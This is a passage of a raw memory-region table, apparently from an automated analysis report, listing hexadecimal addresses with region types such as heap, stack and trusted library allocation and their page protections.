page read and write
|
||
22B162F0000
|
heap
|
page read and write
|
||
19457D20000
|
heap
|
page read and write
|
||
7FF848DF4000
|
trusted library allocation
|
page read and write
|
||
21F2AEF5000
|
heap
|
page read and write
|
||
21F12E4B000
|
trusted library allocation
|
page read and write
|
||
1E45B687000
|
trusted library allocation
|
page read and write
|
||
1E45A571000
|
trusted library allocation
|
page read and write
|
||
21F12CA1000
|
trusted library allocation
|
page read and write
|
||
7FF848E14000
|
trusted library allocation
|
page read and write
|
||
21F220A5000
|
trusted library allocation
|
page read and write
|
||
C7D27FF000
|
stack
|
page read and write
|
||
19457DDF000
|
heap
|
page read and write
|
||
1ADB52BA000
|
trusted library allocation
|
page read and write
|
||
21F12E65000
|
trusted library allocation
|
page read and write
|
||
7FF848F9B000
|
trusted library allocation
|
page read and write
|
||
21F12D99000
|
trusted library allocation
|
page read and write
|
||
21F12D7D000
|
trusted library allocation
|
page read and write
|
||
7FF848FB0000
|
trusted library allocation
|
page read and write
|
||
21F12DF7000
|
trusted library allocation
|
page read and write
|
||
21F12ED3000
|
trusted library allocation
|
page read and write
|
||
4241000
|
trusted library allocation
|
page read and write
|
||
29974E50000
|
heap
|
page read and write
|
||
1E45ADB1000
|
trusted library allocation
|
page read and write
|
||
21F12DB5000
|
trusted library allocation
|
page read and write
|
||
21F12E43000
|
trusted library allocation
|
page read and write
|
||
1E449DBE000
|
trusted library allocation
|
page read and write
|
||
20947820000
|
heap
|
page read and write
|
||
1517000
|
heap
|
page read and write
|
||
2898B353000
|
trusted library allocation
|
page read and write
|
||
1E462747000
|
heap
|
page read and write
|
||
7FF848E1D000
|
trusted library allocation
|
page execute and read and write
|
||
21F2A789000
|
heap
|
page read and write
|
||
1ADB36C0000
|
heap
|
page execute and read and write
|
||
21F2B97F000
|
heap
|
page read and write
|
||
1E459DAE000
|
trusted library allocation
|
page read and write
|
||
14FA000
|
heap
|
page read and write
|
||
7FF848E3B000
|
trusted library allocation
|
page execute and read and write
|
||
1E45A587000
|
trusted library allocation
|
page read and write
|
||
21F12E99000
|
trusted library allocation
|
page read and write
|
||
1ADB507F000
|
trusted library allocation
|
page read and write
|
||
4F7F000
|
stack
|
page read and write
|
||
21F2AFE2000
|
heap
|
page read and write
|
||
20D73490000
|
heap
|
page read and write
|
||
21F2C0B7000
|
heap
|
page read and write
|
||
1B2B1699000
|
trusted library allocation
|
page read and write
|
||
1ADB34C0000
|
trusted library allocation
|
page read and write
|
||
21F12F07000
|
trusted library allocation
|
page read and write
|
||
289898D0000
|
trusted library allocation
|
page read and write
|
||
7FF848F90000
|
trusted library allocation
|
page read and write
|
||
1E449DCF000
|
trusted library allocation
|
page read and write
|
||
21F2AF92000
|
heap
|
page read and write
|
||
21F12CBB000
|
trusted library allocation
|
page read and write
|
||
21F219A3000
|
trusted library allocation
|
page read and write
|
||
21F12EBF000
|
trusted library allocation
|
page read and write
|
||
1E4480F0000
|
heap
|
page read and write
|
||
1561000
|
heap
|
page read and write
|
||
ED0000
|
trusted library allocation
|
page execute and read and write
|
||
21F12EFB000
|
trusted library allocation
|
page read and write
|
||
1ADB52D9000
|
trusted library allocation
|
page read and write
|
||
7FF848DF3000
|
trusted library allocation
|
page execute and read and write
|
||
3CA1000
|
trusted library allocation
|
page read and write
|
||
1B2B14C3000
|
trusted library allocation
|
page read and write
|
||
539E000
|
stack
|
page read and write
|
||
1E45B56F000
|
trusted library allocation
|
page read and write
|
||
20D737E0000
|
heap
|
page read and write
|
||
21F2B000000
|
heap
|
page read and write
|
||
21F2B343000
|
heap
|
page read and write
|
||
21F2A46E000
|
heap
|
page read and write
|
||
9AF43FA000
|
stack
|
page read and write
|
||
1E45A3C1000
|
trusted library allocation
|
page read and write
|
||
21F2A6C0000
|
heap
|
page read and write
|
||
21F2A27D000
|
heap
|
page read and write
|
||
21F12C95000
|
trusted library allocation
|
page read and write
|
||
289899E5000
|
heap
|
page read and write
|
||
7FF848E1B000
|
trusted library allocation
|
page execute and read and write
|
||
21F2B505000
|
heap
|
page read and write
|
||
20D735FB000
|
heap
|
page read and write
|
||
1E449DB8000
|
trusted library allocation
|
page read and write
|
||
F40000
|
heap
|
page read and write
|
||
28D85325000
|
heap
|
page read and write
|
||
5B0E000
|
stack
|
page read and write
|
||
650000
|
heap
|
page read and write
|
||
21F12C7D000
|
trusted library allocation
|
page read and write
|
||
8B0000
|
heap
|
page read and write
|
||
1E459ED8000
|
trusted library allocation
|
page read and write
|
||
20D735D9000
|
heap
|
page read and write
|
||
B7E000
|
stack
|
page read and write
|
||
21F12DA9000
|
trusted library allocation
|
page read and write
|
||
6FDA4FF000
|
stack
|
page read and write
|
||
7FF848E1D000
|
trusted library allocation
|
page execute and read and write
|
||
1B2B14AF000
|
trusted library allocation
|
page read and write
|
||
217C506000
|
stack
|
page read and write
|
||
21F12DB1000
|
trusted library allocation
|
page read and write
|
||
5800000
|
heap
|
page execute and read and write
|
||
21F2B242000
|
heap
|
page read and write
|
||
21F12C6D000
|
trusted library allocation
|
page read and write
|
||
21F12ED5000
|
trusted library allocation
|
page read and write
|
||
21F12CF9000
|
trusted library allocation
|
page read and write
|
||
1280000
|
trusted library allocation
|
page read and write
|
||
21F12E89000
|
trusted library allocation
|
page read and write
|
||
21F12D41000
|
trusted library allocation
|
page read and write
|
||
1E459E48000
|
trusted library allocation
|
page read and write
|
||
1E45AE67000
|
trusted library allocation
|
page read and write
|
||
83EB7FE000
|
stack
|
page read and write
|
||
1B2B1694000
|
trusted library allocation
|
page read and write
|
||
1C8FA8A5000
|
heap
|
page read and write
|
||
21F2AFF6000
|
heap
|
page read and write
|
||
3153F6E000
|
stack
|
page read and write
|
||
21F12E2B000
|
trusted library allocation
|
page read and write
|
||
1E45B487000
|
trusted library allocation
|
page read and write
|
||
1E44A1EC000
|
trusted library allocation
|
page read and write
|
||
B23000
|
trusted library allocation
|
page execute and read and write
|
||
21F2A5B8000
|
heap
|
page read and write
|
||
19232ED8000
|
heap
|
page read and write
|
||
16A0000
|
trusted library allocation
|
page read and write
|
||
C7D230C000
|
stack
|
page read and write
|
||
31548FE000
|
stack
|
page read and write
|
||
209479A0000
|
heap
|
page read and write
|
||
21F12CD7000
|
trusted library allocation
|
page read and write
|
||
19457B50000
|
unkown
|
page readonly
|
||
7FF848E4C000
|
trusted library allocation
|
page execute and read and write
|
||
21F12EA5000
|
trusted library allocation
|
page read and write
|
||
1E449EC9000
|
trusted library allocation
|
page read and write
|
||
21F12DB9000
|
trusted library allocation
|
page read and write
|
||
21F2B9C1000
|
heap
|
page read and write
|
||
28989870000
|
heap
|
page read and write
|
||
750000
|
heap
|
page read and write
|
||
1E45A6B1000
|
trusted library allocation
|
page read and write
|
||
21F12C4B000
|
trusted library allocation
|
page read and write
|
||
1E45B44E000
|
trusted library allocation
|
page read and write
|
||
F00000
|
heap
|
page read and write
|
||
21F12ECD000
|
trusted library allocation
|
page read and write
|
||
F9D000
|
heap
|
page read and write
|
||
1ADB53DE000
|
trusted library allocation
|
page read and write
|
||
21F12DA7000
|
trusted library allocation
|
page read and write
|
||
21F12D15000
|
trusted library allocation
|
page read and write
|
||
7FF848E2D000
|
trusted library allocation
|
page execute and read and write
|
||
1E4625B0000
|
heap
|
page read and write
|
||
7FF848EA6000
|
trusted library allocation
|
page read and write
|
||
21F12E69000
|
trusted library allocation
|
page read and write
|
||
21F12E1D000
|
trusted library allocation
|
page read and write
|
||
7FF848F92000
|
trusted library allocation
|
page read and write
|
||
21F12DC3000
|
trusted library allocation
|
page read and write
|
||
6FDA18E000
|
stack
|
page read and write
|
||
21F12E35000
|
trusted library allocation
|
page read and write
|
||
22B16360000
|
heap
|
page read and write
|
||
16A2000
|
trusted library allocation
|
page read and write
|
||
21F12F0D000
|
trusted library allocation
|
page read and write
|
||
1ADB50E5000
|
trusted library allocation
|
page read and write
|
||
21F12EF1000
|
trusted library allocation
|
page read and write
|
||
90EA89C000
|
stack
|
page read and write
|
||
1690000
|
trusted library allocation
|
page read and write
|
||
9AF3CFE000
|
stack
|
page read and write
|
||
21F2B8AA000
|
heap
|
page read and write
|
||
1E45B42B000
|
trusted library allocation
|
page read and write
|
||
21F12DD5000
|
trusted library allocation
|
page read and write
|
||
1E459F78000
|
trusted library allocation
|
page read and write
|
||
7FF848EC6000
|
trusted library allocation
|
page execute and read and write
|
||
2898B5F3000
|
trusted library allocation
|
page read and write
|
||
1E45B4C4000
|
trusted library allocation
|
page read and write
|
||
21F12D63000
|
trusted library allocation
|
page read and write
|
||
7FF848DF2000
|
trusted library allocation
|
page read and write
|
||
20D735EA000
|
heap
|
page read and write
|
||
21F12DD3000
|
trusted library allocation
|
page read and write
|
||
21F12D35000
|
trusted library allocation
|
page read and write
|
||
21F12DE5000
|
trusted library allocation
|
page read and write
|
||
1B2AF9F0000
|
heap
|
page read and write
|
||
1E45A44B000
|
trusted library allocation
|
page read and write
|
||
1B2B1451000
|
trusted library allocation
|
page read and write
|
||
21F12D73000
|
trusted library allocation
|
page read and write
|
||
7FF848ECC000
|
trusted library allocation
|
page execute and read and write
|
||
21F2BCCD000
|
heap
|
page read and write
|
||
7FF848EC0000
|
trusted library allocation
|
page read and write
|
||
21F12E0F000
|
trusted library allocation
|
page read and write
|
||
1E45B4A3000
|
trusted library allocation
|
page read and write
|
||
7FF848EA0000
|
trusted library allocation
|
page read and write
|
||
21F220B6000
|
trusted library allocation
|
page read and write
|
||
21F21ACD000
|
trusted library allocation
|
page read and write
|
||
19457E71000
|
heap
|
page read and write
|
||
19459C0A000
|
trusted library allocation
|
page read and write
|
||
209477D0000
|
heap
|
page read and write
|
||
20681320000
|
heap
|
page read and write
|
||
192333D5000
|
heap
|
page read and write
|
||
1ADB50EF000
|
trusted library allocation
|
page read and write
|
||
21F12D19000
|
trusted library allocation
|
page read and write
|
||
A3F00FE000
|
stack
|
page read and write
|
||
1ADB3510000
|
heap
|
page read and write
|
||
1E39F210000
|
heap
|
page read and write
|
||
19459A18000
|
trusted library allocation
|
page read and write
|
||
2898B3B5000
|
trusted library allocation
|
page read and write
|
||
21F12EF9000
|
trusted library allocation
|
page read and write
|
||
206814D5000
|
heap
|
page read and write
|
||
21F2B113000
|
heap
|
page read and write
|
||
1B2B14C1000
|
trusted library allocation
|
page read and write
|
||
21F211E1000
|
trusted library allocation
|
page read and write
|
||
1ADB50E9000
|
trusted library allocation
|
page read and write
|
||
361BBFA000
|
stack
|
page read and write
|
||
1E45B707000
|
trusted library allocation
|
page read and write
|
||
5D1E000
|
stack
|
page read and write
|
||
21F2209E000
|
trusted library allocation
|
page read and write
|
||
AD570FE000
|
stack
|
page read and write
|
||
21F12EDD000
|
trusted library allocation
|
page read and write
|
||
20D73660000
|
heap
|
page read and write
|
||
B24000
|
trusted library allocation
|
page read and write
|
||
9B0000
|
heap
|
page read and write
|
||
21F29B5D000
|
heap
|
page read and write
|
||
20947AC0000
|
heap
|
page read and write
|
||
2898B6E7000
|
trusted library allocation
|
page read and write
|
||
4D5E000
|
stack
|
page read and write
|
||
21F12C8D000
|
trusted library allocation
|
page read and write
|
||
85C0E7F000
|
stack
|
page read and write
|
||
21F0F7C0000
|
trusted library allocation
|
page read and write
|
||
7FF848E14000
|
trusted library allocation
|
page read and write
|
||
81F991C000
|
stack
|
page read and write
|
||
2898B631000
|
trusted library allocation
|
page read and write
|
||
21F2A5C7000
|
heap
|
page read and write
|
||
1E449F56000
|
trusted library allocation
|
page read and write
|
||
2068131C000
|
heap
|
page read and write
|
||
217C53E000
|
stack
|
page read and write
|
||
1B2AF91B000
|
heap
|
page read and write
|
||
1B2B1449000
|
trusted library allocation
|
page read and write
|
||
1E45ADDC000
|
trusted library allocation
|
page read and write
|
||
1E45A49F000
|
trusted library allocation
|
page read and write
|
||
1E45A6A7000
|
trusted library allocation
|
page read and write
|
||
168D000
|
trusted library allocation
|
page execute and read and write
|
||
289897F7000
|
heap
|
page read and write
|
||
21F2BD68000
|
heap
|
page read and write
|
||
1ADB50E1000
|
trusted library allocation
|
page read and write
|
||
692000
|
heap
|
page read and write
|
||
20681331000
|
heap
|
page read and write
|
||
1924D3F0000
|
heap
|
page read and write
|
||
1E45B4F1000
|
trusted library allocation
|
page read and write
|
||
21F2AEAD000
|
heap
|
page read and write
|
||
7FF848EB6000
|
trusted library allocation
|
page read and write
|
||
2310E2E7000
|
heap
|
page read and write
|
||
7FF848EC6000
|
trusted library allocation
|
page read and write
|
||
1E44A0B1000
|
trusted library allocation
|
page read and write
|
||
21F12D4D000
|
trusted library allocation
|
page read and write
|
||
2307000
|
trusted library allocation
|
page execute and read and write
|
||
21F12C97000
|
trusted library allocation
|
page read and write
|
||
2898B63B000
|
trusted library allocation
|
page read and write
|
||
19233150000
|
trusted library allocation
|
page read and write
|
||
1ADB50F5000
|
trusted library allocation
|
page read and write
|
||
24EE000
|
stack
|
page read and write
|
||
21F22088000
|
trusted library allocation
|
page read and write
|
||
32B6000
|
trusted library allocation
|
page read and write
|
||
21F2BF35000
|
heap
|
page read and write
|
||
20947AC5000
|
heap
|
page read and write
|
||
154B000
|
heap
|
page read and write
|
||
1ADB3740000
|
heap
|
page read and write
|
||
1B2AFA60000
|
trusted library allocation
|
page read and write
|
||
24F0000
|
heap
|
page read and write
|
||
7FF848E02000
|
trusted library allocation
|
page read and write
|
||
21F12DFB000
|
trusted library allocation
|
page read and write
|
||
A3EFFFE000
|
stack
|
page read and write
|
||
28989630000
|
heap
|
page read and write
|
||
21F12D79000
|
trusted library allocation
|
page read and write
|
||
7FF848E1D000
|
trusted library allocation
|
page execute and read and write
|
||
21F2B4C3000
|
heap
|
page read and write
|
||
1E39F200000
|
heap
|
page read and write
|
||
21F12EBB000
|
trusted library allocation
|
page read and write
|
||
7FF848F10000
|
trusted library allocation
|
page execute and read and write
|
||
28D85130000
|
heap
|
page read and write
|
||
21F2A101000
|
heap
|
page read and write
|
||
7FF848FC4000
|
trusted library allocation
|
page read and write
|
||
1E39F4D0000
|
heap
|
page read and write
|
||
21F2124D000
|
trusted library allocation
|
page read and write
|
||
21F12C63000
|
trusted library allocation
|
page read and write
|
||
19234B77000
|
trusted library allocation
|
page read and write
|
||
1E45ADA7000
|
trusted library allocation
|
page read and write
|
||
1E45A58F000
|
trusted library allocation
|
page read and write
|
||
29974C5B000
|
heap
|
page read and write
|
||
21F12C53000
|
trusted library allocation
|
page read and write
|
||
1ADB52C4000
|
trusted library allocation
|
page read and write
|
||
AD574FF000
|
stack
|
page read and write
|
||
2898B341000
|
trusted library allocation
|
page read and write
|
||
21F12E13000
|
trusted library allocation
|
page read and write
|
||
21F12DDF000
|
trusted library allocation
|
page read and write
|
||
21F2BAFB000
|
heap
|
page read and write
|
||
21F12DFD000
|
trusted library allocation
|
page read and write
|
||
20D735A0000
|
heap
|
page read and write
|
||
361AEFB000
|
stack
|
page read and write
|
||
21F2B481000
|
heap
|
page read and write
|
||
19232EEA000
|
heap
|
page read and write
|
||
2898B63D000
|
trusted library allocation
|
page read and write
|
||
21F2B2F6000
|
heap
|
page read and write
|
||
21F12EE1000
|
trusted library allocation
|
page read and write
|
||
21F12F01000
|
trusted library allocation
|
page read and write
|
||
21F2AE41000
|
heap
|
page read and write
|
||
21F0F7F0000
|
trusted library allocation
|
page read and write
|
||
1E45A5FC000
|
trusted library allocation
|
page read and write
|
||
21F12EDF000
|
trusted library allocation
|
page read and write
|
||
21F0F830000
|
trusted library allocation
|
page read and write
|
||
21F21B8D000
|
trusted library allocation
|
page read and write
|
||
19457B52000
|
unkown
|
page readonly
|
||
21F12D77000
|
trusted library allocation
|
page read and write
|
||
2094780C000
|
heap
|
page read and write
|
||
21F2A67E000
|
heap
|
page read and write
|
||
21F21B43000
|
trusted library allocation
|
page read and write
|
||
83EB4FE000
|
stack
|
page read and write
|
||
1ADB3650000
|
heap
|
page read and write
|
||
21F2BDAA000
|
heap
|
page read and write
|
||
20D73630000
|
heap
|
page read and write
|
||
21F2B612000
|
heap
|
page read and write
|
||
1E4482D5000
|
heap
|
page read and write
|
||
1E45AD6F000
|
trusted library allocation
|
page read and write
|
||
1924D404000
|
heap
|
page read and write
|
||
FD8E35F000
|
stack
|
page read and write
|
||
20D7368C000
|
heap
|
page read and write
|
||
28D85320000
|
heap
|
page read and write
|
||
1D291DC0000
|
heap
|
page read and write
|
||
20947810000
|
heap
|
page read and write
|
||
21F12C85000
|
trusted library allocation
|
page read and write
|
||
7FF848FC3000
|
trusted library allocation
|
page read and write
|
||
1ADB50D7000
|
trusted library allocation
|
page read and write
|
||
21F2B8EC000
|
heap
|
page read and write
|
||
21F12E57000
|
trusted library allocation
|
page read and write
|
||
13A0000
|
heap
|
page read and write
|
||
21F2B696000
|
heap
|
page read and write
|
||
21F12D95000
|
trusted library allocation
|
page read and write
|
||
7FF848DF2000
|
trusted library allocation
|
page read and write
|
||
1B2AFA50000
|
trusted library allocation
|
page read and write
|
||
217C536000
|
stack
|
page read and write
|
||
21F12DCF000
|
trusted library allocation
|
page read and write
|
||
7FF848F99000
|
trusted library allocation
|
page read and write
|
||
21F12C81000
|
trusted library allocation
|
page read and write
|
||
12F0000
|
heap
|
page read and write
|
||
21F12CA5000
|
trusted library allocation
|
page read and write
|
||
AD575F9000
|
stack
|
page read and write
|
||
21F2A871000
|
heap
|
page read and write
|
||
77785FE000
|
stack
|
page read and write
|
||
21F12EF5000
|
trusted library allocation
|
page read and write
|
||
49E0000
|
trusted library allocation
|
page read and write
|
||
21F2AA80000
|
heap
|
page read and write
|
||
19457D80000
|
trusted library allocation
|
page read and write
|
||
7A0000
|
heap
|
page read and write
|
||
29974CA2000
|
heap
|
page read and write
|
||
21F12EA1000
|
trusted library allocation
|
page read and write
|
||
21F12E19000
|
trusted library allocation
|
page read and write
|
||
533E000
|
stack
|
page read and write
|
||
1683000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848F90000
|
trusted library allocation
|
page read and write
|
||
7FF848E2B000
|
trusted library allocation
|
page execute and read and write
|
||
3154BFE000
|
stack
|
page read and write
|
||
21F12C4D000
|
trusted library allocation
|
page read and write
|
||
20D73630000
|
heap
|
page read and write
|
||
21F12C33000
|
trusted library allocation
|
page read and write
|
||
19457DA0000
|
heap
|
page read and write
|
||
21F2A034000
|
heap
|
page read and write
|
||
1B2B1499000
|
trusted library allocation
|
page read and write
|
||
21F2AEA7000
|
heap
|
page read and write
|
||
1E45B53C000
|
trusted library allocation
|
page read and write
|
||
21F12EF7000
|
trusted library allocation
|
page read and write
|
||
2898B3C1000
|
trusted library allocation
|
page read and write
|
||
21F2A747000
|
heap
|
page read and write
|
||
AD572FE000
|
stack
|
page read and write
|
||
7FF848F92000
|
trusted library allocation
|
page read and write
|
||
19234EC1000
|
trusted library allocation
|
page read and write
|
||
21F29EE2000
|
heap
|
page read and write
|
||
1B2AFAD0000
|
heap
|
page read and write
|
||
7FF848EF6000
|
trusted library allocation
|
page execute and read and write
|
||
23E0000
|
heap
|
page execute and read and write
|
||
21F0F695000
|
heap
|
page read and write
|
||
21F2B33E000
|
heap
|
page read and write
|
||
1B2B16A1000
|
trusted library allocation
|
page read and write
|
||
1E459E15000
|
trusted library allocation
|
page read and write
|
||
7FF848DED000
|
trusted library allocation
|
page execute and read and write
|
||
20681306000
|
heap
|
page read and write
|
||
21F2A2A0000
|
heap
|
page read and write
|
||
7FF848E10000
|
trusted library allocation
|
page read and write
|
||
3062000
|
trusted library allocation
|
page read and write
|
||
28989760000
|
heap
|
page read and write
|
||
9AF3FFD000
|
stack
|
page read and write
|
||
21F12D01000
|
trusted library allocation
|
page read and write
|
||
1ADB536B000
|
trusted library allocation
|
page read and write
|
||
A0A000
|
heap
|
page read and write
|
||
194721D7000
|
heap
|
page read and write
|
||
7FF848E20000
|
trusted library allocation
|
page read and write
|
||
21F2B45A000
|
heap
|
page read and write
|
||
21F2AF79000
|
heap
|
page read and write
|
||
7FF848EA6000
|
trusted library allocation
|
page read and write
|
||
9FE000
|
stack
|
page read and write
|
||
21F2BBBF000
|
heap
|
page read and write
|
||
21F2A1A3000
|
heap
|
page read and write
|
||
1E44A2B6000
|
trusted library allocation
|
page read and write
|
||
12B0000
|
heap
|
page execute and read and write
|
||
21F12ECB000
|
trusted library allocation
|
page read and write
|
||
2898B3A5000
|
trusted library allocation
|
page read and write
|
||
21F12E01000
|
trusted library allocation
|
page read and write
|
||
1E459EC0000
|
trusted library allocation
|
page read and write
|
||
1E45B57C000
|
trusted library allocation
|
page read and write
|
||
1ADB52D1000
|
trusted library allocation
|
page read and write
|
||
1ADB540D000
|
trusted library allocation
|
page read and write
|
||
1E45A4F3000
|
trusted library allocation
|
page read and write
|
||
31547FF000
|
stack
|
page read and write
|
||
7FF848E1B000
|
trusted library allocation
|
page execute and read and write
|
||
1830EC87000
|
heap
|
page read and write
|
||
21F0F7E3000
|
heap
|
page read and write
|
||
2898B3B7000
|
trusted library allocation
|
page read and write
|
||
13EE000
|
stack
|
page read and write
|
||
1E459E80000
|
trusted library allocation
|
page read and write
|
||
21F2BFF2000
|
heap
|
page read and write
|
||
7FF848DFD000
|
trusted library allocation
|
page execute and read and write
|
||
21F2B75E000
|
heap
|
page read and write
|
||
2898B36D000
|
trusted library allocation
|
page read and write
|
||
21F2A374000
|
heap
|
page read and write
|
||
1830EC60000
|
heap
|
page read and write
|
||
21F12CD3000
|
trusted library allocation
|
page read and write
|
||
1E449F3F000
|
trusted library allocation
|
page read and write
|
||
1E45A3A1000
|
trusted library allocation
|
page read and write
|
||
2898B6C3000
|
trusted library allocation
|
page read and write
|
||
2898B6F7000
|
trusted library allocation
|
page read and write
|
||
1E449B50000
|
trusted library allocation
|
page read and write
|
||
19459850000
|
heap
|
page read and write
|
||
21F12E59000
|
trusted library allocation
|
page read and write
|
||
21F12CF1000
|
trusted library allocation
|
page read and write
|
||
1410000
|
heap
|
page read and write
|
||
29974C73000
|
heap
|
page read and write
|
||
21F219B8000
|
trusted library allocation
|
page read and write
|
||
28989755000
|
heap
|
page read and write
|
||
7FF848EAC000
|
trusted library allocation
|
page execute and read and write
|
||
21F12DC1000
|
trusted library allocation
|
page read and write
|
||
21F29B00000
|
heap
|
page read and write
|
||
7FF848F10000
|
trusted library allocation
|
page execute and read and write
|
||
21F12EBD000
|
trusted library allocation
|
page read and write
|
||
1E44A092000
|
trusted library allocation
|
page read and write
|
||
21F21AA3000
|
trusted library allocation
|
page read and write
|
||
D53000
|
trusted library allocation
|
page execute and read and write
|
||
1E44A1FE000
|
trusted library allocation
|
page read and write
|
||
19232F95000
|
heap
|
page read and write
|
||
194599E7000
|
trusted library allocation
|
page read and write
|
||
19459910000
|
heap
|
page execute and read and write
|
||
1B2AF8A0000
|
heap
|
page read and write
|
||
7FF848F99000
|
trusted library allocation
|
page read and write
|
||
21F12D85000
|
trusted library allocation
|
page read and write
|
||
21F12E7D000
|
trusted library allocation
|
page read and write
|
||
537C000
|
stack
|
page read and write
|
||
E6B000
|
trusted library allocation
|
page execute and read and write
|
||
1E448108000
|
heap
|
page read and write
|
||
1E44A172000
|
trusted library allocation
|
page read and write
|
||
1E4481F2000
|
heap
|
page read and write
|
||
20681270000
|
heap
|
page read and write
|
||
21F2B846000
|
heap
|
page read and write
|
||
21F12C4F000
|
trusted library allocation
|
page read and write
|
||
7FF848FF2000
|
trusted library allocation
|
page read and write
|
||
1ADB5083000
|
trusted library allocation
|
page read and write
|
||
21F12D7B000
|
trusted library allocation
|
page read and write
|
||
21F12676000
|
trusted library allocation
|
page read and write
|
||
21F2125D000
|
trusted library allocation
|
page read and write
|
||
21F2192D000
|
trusted library allocation
|
page read and write
|
||
1E45A4C3000
|
trusted library allocation
|
page read and write
|
||
21F2B5CF000
|
heap
|
page read and write
|
||
7FF848E3C000
|
trusted library allocation
|
page execute and read and write
|
||
21F2A500000
|
heap
|
page read and write
|
||
20D7361F000
|
heap
|
page read and write
|
||
E67000
|
trusted library allocation
|
page execute and read and write
|
||
23F67D9B000
|
heap
|
page read and write
|
||
21F2B888000
|
heap
|
page read and write
|
||
21F12D07000
|
trusted library allocation
|
page read and write
|
||
1ADB5419000
|
trusted library allocation
|
page read and write
|
||
1B2B146D000
|
trusted library allocation
|
page read and write
|
||
21F0F7E0000
|
heap
|
page read and write
|
||
1E4628F0000
|
heap
|
page read and write
|
||
7FF848FC0000
|
trusted library allocation
|
page read and write
|
||
3255000
|
trusted library allocation
|
page read and write
|
||
9E0000
|
heap
|
page read and write
|
||
361A5FE000
|
stack
|
page read and write
|
||
1E45A4A7000
|
trusted library allocation
|
page read and write
|
||
1E45B43B000
|
trusted library allocation
|
page read and write
|
||
1D291E60000
|
heap
|
page read and write
|
||
217C51E000
|
stack
|
page read and write
|
||
F5D000
|
heap
|
page read and write
|
||
7FF848DF0000
|
trusted library allocation
|
page read and write
|
||
7FF848FB0000
|
trusted library allocation
|
page read and write
|
||
28989730000
|
heap
|
page read and write
|
||
1E459D50000
|
trusted library allocation
|
page read and write
|
||
21F12E8F000
|
trusted library allocation
|
page read and write
|
||
1E448100000
|
heap
|
page read and write
|
||
21F12E15000
|
trusted library allocation
|
page read and write
|
||
1830EE30000
|
heap
|
page read and write
|
||
21F12D39000
|
trusted library allocation
|
page read and write
|
||
1E46273D000
|
heap
|
page read and write
|
||
7FF848DFD000
|
trusted library allocation
|
page execute and read and write
|
||
21F0F6EB000
|
heap
|
page read and write
|
||
21F12D1F000
|
trusted library allocation
|
page read and write
|
||
1E45B45B000
|
trusted library allocation
|
page read and write
|
||
32B8000
|
trusted library allocation
|
page read and write
|
||
21F2AEBD000
|
heap
|
page read and write
|
||
21F0F7D0000
|
heap
|
page read and write
|
||
21F12CCF000
|
trusted library allocation
|
page read and write
|
||
21F12E3D000
|
trusted library allocation
|
page read and write
|
||
1C8FA520000
|
heap
|
page read and write
|
||
21F12E31000
|
trusted library allocation
|
page read and write
|
||
1E44811B000
|
heap
|
page read and write
|
||
21F12C8B000
|
trusted library allocation
|
page read and write
|
||
21F12E67000
|
trusted library allocation
|
page read and write
|
||
1ADB3430000
|
heap
|
page read and write
|
||
1B2B17B7000
|
trusted library allocation
|
page read and write
|
||
3220000
|
trusted library allocation
|
page execute and read and write
|
||
19233140000
|
heap
|
page read and write
|
||
A3F0EFE000
|
stack
|
page read and write
|
||
187E000
|
stack
|
page read and write
|
||
30CE000
|
stack
|
page read and write
|
||
1B2B14B1000
|
trusted library allocation
|
page read and write
|
||
2898B6DD000
|
trusted library allocation
|
page read and write
|
||
31545FD000
|
stack
|
page read and write
|
||
F63000
|
heap
|
page read and write
|
||
19459D37000
|
trusted library allocation
|
page read and write
|
||
21F12E27000
|
trusted library allocation
|
page read and write
|
||
1B2B14A3000
|
trusted library allocation
|
page read and write
|
||
7FF848DF3000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848E96000
|
trusted library allocation
|
page read and write
|
||
1E45B3FD000
|
trusted library allocation
|
page read and write
|
||
21F12E81000
|
trusted library allocation
|
page read and write
|
||
21F12DA5000
|
trusted library allocation
|
page read and write
|
||
21F0F720000
|
heap
|
page read and write
|
||
1E45B483000
|
trusted library allocation
|
page read and write
|
||
7FF848E20000
|
trusted library allocation
|
page read and write
|
||
21F2A3C8000
|
heap
|
page read and write
|
||
1E45A416000
|
trusted library allocation
|
page read and write
|
||
19459D31000
|
trusted library allocation
|
page read and write
|
||
77784FF000
|
stack
|
page read and write
|
||
1E459EA7000
|
trusted library allocation
|
page read and write
|
||
7FF848F9E000
|
trusted library allocation
|
page read and write
|
||
A3EF74E000
|
stack
|
page read and write
|
||
1B2B14A7000
|
trusted library allocation
|
page read and write
|
||
1E45AE91000
|
trusted library allocation
|
page read and write
|
||
1ADB5323000
|
trusted library allocation
|
page read and write
|
||
20681290000
|
heap
|
page read and write
|
||
1E45A5A7000
|
trusted library allocation
|
page read and write
|
||
1B2B16A5000
|
trusted library allocation
|
page read and write
|
||
7FF848DF3000
|
trusted library allocation
|
page execute and read and write
|
||
20947750000
|
heap
|
page read and write
|
||
1E449F03000
|
trusted library allocation
|
page read and write
|
||
21F12DE3000
|
trusted library allocation
|
page read and write
|
||
21F12EED000
|
trusted library allocation
|
page read and write
|
||
7FF848EA6000
|
trusted library allocation
|
page read and write
|
||
21F12E39000
|
trusted library allocation
|
page read and write
|
||
1D1357C0000
|
heap
|
page read and write
|
||
21F12C51000
|
trusted library allocation
|
page read and write
|
||
1ADB38C0000
|
heap
|
page read and write
|
||
217CBFE000
|
stack
|
page read and write
|
||
1E45B4E4000
|
trusted library allocation
|
page read and write
|
||
7FF848EAC000
|
trusted library allocation
|
page execute and read and write
|
||
1680000
|
trusted library allocation
|
page read and write
|
||
21F2C014000
|
heap
|
page read and write
|
||
1B2B17D9000
|
trusted library allocation
|
page read and write
|
||
21F12EC5000
|
trusted library allocation
|
page read and write
|
||
1E45A49C000
|
trusted library allocation
|
page read and write
|
||
1B2AFAD5000
|
heap
|
page read and write
|
||
31546FE000
|
stack
|
page read and write
|
||
19457F95000
|
heap
|
page read and write
|
||
21F12C8F000
|
trusted library allocation
|
page read and write
|
||
B30000
|
heap
|
page read and write
|
||
1E46270D000
|
heap
|
page read and write
|
||
289897B5000
|
heap
|
page read and write
|
||
1830EF90000
|
heap
|
page read and write
|
||
21F211F0000
|
trusted library allocation
|
page read and write
|
||
1E44A17A000
|
trusted library allocation
|
page read and write
|
||
21F2BA25000
|
heap
|
page read and write
|
||
206812E0000
|
heap
|
page read and write
|
||
217C54C000
|
stack
|
page read and write
|
||
19234D9A000
|
trusted library allocation
|
page read and write
|
||
523E000
|
stack
|
page read and write
|
||
21F11272000
|
trusted library allocation
|
page read and write
|
||
7FF848FA9000
|
trusted library allocation
|
page read and write
|
||
21F12D83000
|
trusted library allocation
|
page read and write
|
||
21F0F626000
|
